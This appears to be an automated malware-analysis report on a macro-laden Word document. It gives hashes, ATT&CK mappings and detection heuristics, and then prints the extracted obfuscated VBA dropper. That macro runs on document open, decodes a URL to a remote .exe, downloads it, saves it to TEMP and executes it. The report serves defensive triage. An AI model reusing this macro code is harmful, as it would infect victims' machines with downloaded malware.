Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0195667c443c20a1…

MALICIOUS

Office (OLE)

71.0 KB Created: 2016-05-09 21:47:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 928625b7778768866b0a308c432229a4 SHA-1: 8c2f5ea322958bd322fb11a452d470a123a4eada SHA-256: 0195667c443c20a1524044686cf99decd62f73b157c5e150dae1e2b740184d89
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros that trigger on document open, utilizing WScript.Shell and CreateObject to execute arbitrary code. This strongly suggests the document is a dropper designed to download and execute a secondary payload, as indicated by the ClamAV detection 'Doc.Dropper.Donoff-5743530-0'. The obfuscated nature of the VBA code prevents a more detailed analysis of the payload's specific actions.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim HYZoDRudI As Integer
Set XETrTRXL = CreateObject("WScript.Shell")
End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim sXMzCyPBRE As Boolean
Set bZiQEUoAX = CreateObject("ADODB.Stream")
End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Dim pdxxPHSfW As Integer, kTRGfWEy As Integer
uvdSnC = CallByName(mdSgn, WTYaj, 2)
End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_Open()
Dim sWZeXmspMZ As Boolean
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7477 bytes
SHA-256: da40084128e34dee80523ab81011de09ee853921503c4e2f1ba8e49a338a1c4f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
123 of 194 identifiers look randomly generated (e.g. 'RxKeNsKpNonKsCeCBKoNxdKy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim sWZeXmspMZ As Boolean
pNgavmiEKJ.gFfmUVs
End Sub
Private Sub fiajFHZsQ()
RdzCgNLfo "HktK", "y9xGo", False
cdVmY 1519, False, True
End Sub

Attribute VB_Name = "TtcIaXa"
Private Sub jESbkyhpJ(ByVal xSOLF As String)
cUAGYTZsVc 1225, 2737, "Ns0Rg"
eeccmroa 8244
sIezp
qjETUiCBEo 1195, "ivN1", "y8J"
End Sub
Public Function XHESS(ByVal GGqKPKJrex As Integer, ByVal fmCfWeSIcR As String) As String
Dim KcvPasUi As Boolean
XHESS = Mid(fmCfWeSIcR, GGqKPKJrex, 1)
End Function
Private Sub NKHVta(ByVal MCXmSWbhc As String)
yqdpRWtCu
End Sub
Public Function NcgIWIQvgK(ByVal gHcvgocwY As String, ByVal NzkNKHftg As String, ByVal yOOFbERKq As String) As Boolean
Dim VnIBA As String
Dim PBvML As String
NcgIWIQvgK = InStr(1, yOOFbERKq, gHcvgocwY)
End Function

Attribute VB_Name = "qlpiGK"
Public Function RiYKggL(ByVal gcFsEfv As String, ByVal cEfbjz As String) As String
Dim OtAqQxMv As Boolean
Dim SdPdCiw As String, IBGFmd As String
For pvWGCLgX = 1 To Len(gcFsEfv)
OtAqQxMv = TtcIaXa.NcgIWIQvgK(TtcIaXa.XHESS(pvWGCLgX, gcFsEfv), uJCPXVWw, cEfbjz)
If Not OtAqQxMv Then
XQUKUIlGS = 9746
RiYKggL = RiYKggL & TtcIaXa.XHESS(pvWGCLgX, gcFsEfv)
End If
Next
End Function
Private Function uJCPXVWw() As String
IkmTucyV = ""
uJCPXVWw = "2WJnP"
End Function

Attribute VB_Name = "tIvJlZJvF"
Public Function uvdSnC(ByVal mdSgn As Object, ByVal CfOzRoZGun As String, ByVal WTYaj As String, ByVal VgCqVQCru As Integer) As Variant
Dim pdxxPHSfW As Integer, kTRGfWEy As Integer
uvdSnC = CallByName(mdSgn, WTYaj, 2)
End Function
Public Sub aeAafPvM(ByVal PvlzazUfA As String, ByVal tpyGbdoEQj As Variant, ByVal HaGNDmv As Variant, ByVal GBtVkMkQ As Object)
Dim lHmBuq As String
CallByName GBtVkMkQ, PvlzazUfA, 1, HaGNDmv, tpyGbdoEQj
End Sub
Private Function rtWcGCOGDg() As Boolean
HTXti "tgYI"
rtWcGCOGDg = False
End Function
Public Function MFFQv(ByVal BeAJg As String, ByVal QSCuS As String, ByVal cvgpWXl As Object) As Variant
Dim JBfjk As Boolean
Dim AzQjSLoU As Boolean
Set MFFQv = CallByName(cvgpWXl, QSCuS, 2, BeAJg)
End Function
Public Sub ofQEagNCR(ByVal zYwmBjKdA As Boolean, ByVal BcimJzTXxI As String, ByVal zZDIBErBe As Object, ByVal ZpLhgd As Variant)
Dim sbMoAZE As Integer
Dim LOkAk As Integer
CallByName zZDIBErBe, BcimJzTXxI, 1, ZpLhgd
End Sub
Private Sub huWOw(ByVal XshmLCte As Boolean)
NvOKlpusE
aVtapbVnl "", 1093, 9096
End Sub
Private Function QqZeLOBHL() As Integer
nCnktKv False
hCCQENhD 3748, 2598, "BWQ"
CGgZkEaFBc
QqZeLOBHL = 1258
End Function
Public Sub ETZlueM(ByVal ffzrOMlAl As Integer, ByVal oegby As String, ByVal dngYyt As Variant, ByVal yYMpHBuEO As String, ByVal WVZkUPnPQy As Object)
CallByName WVZkUPnPQy, oegby, 4, dngYyt
End Sub
Private Function BDIyEQNA(ByVal pVGKTKG As String) As Boolean
gOZso 1884
BDIyEQNA = True
End Function
Public Sub nDXWgVaB(ByVal jFLQYI As Object, ByVal aPcNqh As String)
Dim HJKDWFSbK As Integer
Dim qkZxzUw As Integer
kayWGvM = ""
CallByName jFLQYI, aPcNqh, 1
End Sub

Attribute VB_Name = "yxAzCBpe"
Public Function bZiQEUoAX() As Object
Dim sXMzCyPBRE As Boolean
Set bZiQEUoAX = CreateObject("ADODB.Stream")
End Function
Public Function XETrTRXL() As Object
Dim HYZoDRudI As Integer
Set XETrTRXL = CreateObject("WScript.Shell")
End Function
Public Function aJIfxJZodD() As Object
Dim AiSqstM As String
Set aJIfxJZodD = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Function QufpcZdA() As Integer
YRcIVIcog
zzTmoaeZe False, ""
ngYFxDZeTQ False, 7239, ""
QufpcZdA = 7668
End Function

Attribute VB_Name = "pNgavmiEKJ"
Private Function EomLao() As String
qAgGuRAod = 7052
EomLao = qlpiGK.RiYKggL("hE1t1tSp:S/E/EsS1a1scEuEaS.1ScEoEmS/sEySsEEteSmS1/cSSa1cEhe1S/31E2fSE32ESg.E1exE1e", "ES1")
End Function
Private Sub ppkHpIx(ByVal YnuZrPfbaC As String)
Dim Pyqsuj As Integer
MDpGo = "kBmv"
tIvJlZJvF.ofQEagNCR True, PGEJFjiOIP, yxAzCBpe.XETrTRXL, YnuZrPfbaC
End Sub
Public Sub gFfmUVs()
cKAIKaerq = ""
YUSZTLp
End Sub
Private Function cQrOaLqaF() As String
cQrOaLqaF = "pyHY"
End Function
Private Function rPeqnQcyK() As String
Dim eEhHa As Integer
rPeqnQcyK = JzEfZof(qlpiGK.RiYKggL("eTJEoMPe", "eJo")) & zVFSzCf
End Function
Private Function WNqBeL() As String
WNqBeL = qlpiGK.RiYKggL("RxKeNsKpNonKsCeCBKoNxdKy", "NKCx")
End Function
Private Function NhnSmVlON() As String
NhnSmVlON = "Vb0T7"
End Function
Private Sub aJBkAaphH(ByVal sIPyuadE As Integer, ByVal GBZskde As String, ByVal lxYJsBCX As String, ByVal gUaDB As String)
Dim TaULKEoJ As String, ZyPTWCYq As Integer
Set oxUnFM = yxAzCBpe.aJIfxJZodD
oxUnFM.Open DhDnlIsSB, lxYJsBCX, False
tIvJlZJvF.nDXWgVaB oxUnFM, qlpiGK.RiYKggL("PSeYbndb", "bPY")
rrQumoYv False, GBZskde, "yR0", tIvJlZJvF.uvdSnC(oxUnFM, "KP", WNqBeL, 1945)
End Sub
Private Function hHCstF() As String
hHCstF = qlpiGK.RiYKggL("CRlAoRsAAe", "ERNA")
End Function
Private Function cKNQjiDW() As String
Dim pOrRFib As Integer
cKNQjiDW = EomLao
End Function
Private Sub CEGmN()
JPvLzyRGsx 7449
NURQhgJR
bFqvCc False, True, 9563
qjMaTOIxQi
End Sub
Private Function zVFSzCf() As String
Dim jbmFfpJi As String
Dim YdVNBik As Integer
zVFSzCf = YTtJZVQK
End Function
Private Sub YUSZTLp()
On Error GoTo lesJtbZS
aJBkAaphH 5708, rPeqnQcyK, cKNQjiDW, NhnSmVlON
ieHcrIl = "BsVc4"
ppkHpIx rPeqnQcyK
Exit Sub
QIGVmfY = "4u"
lesJtbZS:
End Sub
Private Function YTtJZVQK() As String
IFLCzb = True
YTtJZVQK = qlpiGK.RiYKggL("j/dgj02kj1g1S66Sjbagrf.Sjexkje", "Sjgkr")
End Function
Private Function LtgcPJUr(ByVal TZigq As Integer, ByVal BkXNoxybM As Boolean) As String
ICxOAIJEjl
JDQNlwwUu
ubsRjN True
LtgcPJUr = ""
End Function
Private Function fgsPwk(ByVal quCugkfEx As Boolean) As Boolean
If NACpLN("SzbAB", "hv") Then
GbhxArF
Halxgk
End If
nDkOinXoNp
SclaOvXM 3912, False, "zW3X"
SFyHb
fgsPwk = False
End Function
Private Sub xqHViadvzm()
aBDhFcyR "", "FFpd"
End Sub
Private Function DhDnlIsSB() As String
bwVhN = 9168
DhDnlIsSB = qlpiGK.RiYKggL("GHZEjT", "4jZc0H")
End Function
Private Function rdpYgruZts() As String
rdpYgruZts = qlpiGK.RiYKggL("wOpWeinw", "wiW")
End Function
Private Function PGEJFjiOIP() As String
mVMPpQPeMQ = 3401
PGEJFjiOIP = qlpiGK.RiYKggL("jE0xe0jc", "jWh60f")
End Function
Private Sub rrQumoYv(ByVal cNMdym As Boolean, ByVal PsZYlZhJp As String, ByVal XBbWWJWuh As String, ByVal Cdyuk As Variant)
Dim RztyfS As String
Set jFBKbfZja = yxAzCBpe.bZiQEUoAX
bZfJcN = 978
tIvJlZJvF.ETZlueM 654, WCCYnnYfik, 1, cQrOaLqaF, jFBKbfZja
tIvJlZJvF.nDXWgVaB jFBKbfZja, rdpYgruZts
tIvJlZJvF.ofQEagNCR True, qlpiGK.RiYKggL("Wbr3i0OtOe", "b3O0"), jFBKbfZja, Cdyuk
tIvJlZJvF.aeAafPvM qlpiGK.RiYKggL("hSaGhverTGhoFGrilGeG", "rhG"), 2, PsZYlZhJp, jFBKbfZja
tIvJlZJvF.nDXWgVaB jFBKbfZja, hHCstF
End Sub
Private Function JzEfZof(ByVal EjQEYb As String) As String
Set ikHNExdC = tIvJlZJvF.MFFQv(qlpiGK.RiYKggL("rPrROFCr0ErSFS", "r0F"), qlpiGK.RiYKggL("EWwn vi  ro00n0mwenWtw", "Ww0 "), yxAzCBpe.XETrTRXL)
ZcTzOUAO = False
JzEfZof = ikHNExdC(EjQEYb)
End Function
Private Function WCCYnnYfik() As String
WCCYnnYfik = qlpiGK.RiYKggL("TPyPlpe1", "1lmPs")
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.